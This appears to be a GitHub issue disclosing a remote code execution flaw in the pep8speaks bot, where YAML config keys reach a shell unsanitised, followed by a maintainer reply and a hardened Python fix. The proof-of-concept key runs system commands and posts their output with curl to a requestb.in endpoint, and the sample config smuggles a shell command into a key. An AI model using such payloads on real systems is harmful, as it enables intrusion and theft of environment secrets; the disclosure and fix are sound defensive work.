Remote code execution
There is a remote code execution vector, via the .pep8speaks.yaml file in the source repository. The keys in the pycodestyle dictionary are not sanitized before being passed to subprocess.Popen(shell=True).
    pycodestyle:
      max-line-length: 100  # Default is 79 in PEP8
      ";(id;pwd;ls;uname -a) | curl -X POST -d @- http://requestb.in/1ap8agd1;#": 5
This is demonstrated in pull #27 and https://requestb.in/1ap8agd1?inspect
While nothing terribly secret was posted above, the contents of various bits of the environment are equally accessible.
Issue Analytics
- State:
- Created 7 years ago
- Comments: 8 (3 by maintainers)
@OrkoHunter Please look into this.
I’ve added a check that the updated dictionary will only contain the keys defined (and expected).
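The following is an added example, not pep8speaks' own code: it contrasts an assumed shape of the bug (config keys interpolated into a shell string) with a hardened builder that keeps only expected keys, validates their values, and returns an argument list for use without a shell. The function names, the allowlisted option set and the sample configuration are assumptions made for illustration.

```python
import re

# pycodestyle error/warning codes such as E501 or W291.
_CODE = re.compile(r"^[EW]\d{1,3}$")

def _line_length(v):
    # bool is a subclass of int, so exclude it explicitly.
    return isinstance(v, int) and not isinstance(v, bool) and 1 <= v <= 1000

def _code_list(v):
    return (isinstance(v, list) and len(v) > 0
            and all(isinstance(c, str) and _CODE.match(c) for c in v))

# Allowlist: option name -> value validator (which options the bot
# exposes is an assumption of this example).
ALLOWED = {"max-line-length": _line_length, "ignore": _code_list, "select": _code_list}

def unsafe_command(config, path):
    """Assumed shape of the bug: every key lands in a string meant for shell=True."""
    opts = " ".join(f"--{k}={v}" for k, v in config.items())
    return f"pycodestyle {opts} {path}"

def safe_argv(config, path):
    """Return (argv, rejected_keys); argv is for subprocess.run(argv) with no shell."""
    argv, rejected = ["pycodestyle"], []
    for key, value in config.items():
        check = ALLOWED.get(key)
        if check is None or not check(value):
            rejected.append(key)  # unknown key or bad value: drop it, report it
            continue
        if isinstance(value, list):
            value = ",".join(value)
        argv.append(f"--{key}={value}")
    argv += ["--", path]  # end-of-options marker, so the path is never parsed as a flag
    return argv, rejected

# Constructed sample: two legitimate options plus one key carrying shell syntax.
CONSTRUCTED_CONFIG = {
    "max-line-length": 100,
    "ignore": ["E501", "W291"],
    "; echo INJECTED #": 5,
}

if __name__ == "__main__":
    print("shell string:", unsafe_command(CONSTRUCTED_CONFIG, "example.py"))
    print("argv, rejected:", safe_argv(CONSTRUCTED_CONFIG, "example.py"))
```

Logging the rejected keys gives maintainers a signal that a repository's .pep8speaks.yaml contained something unexpected.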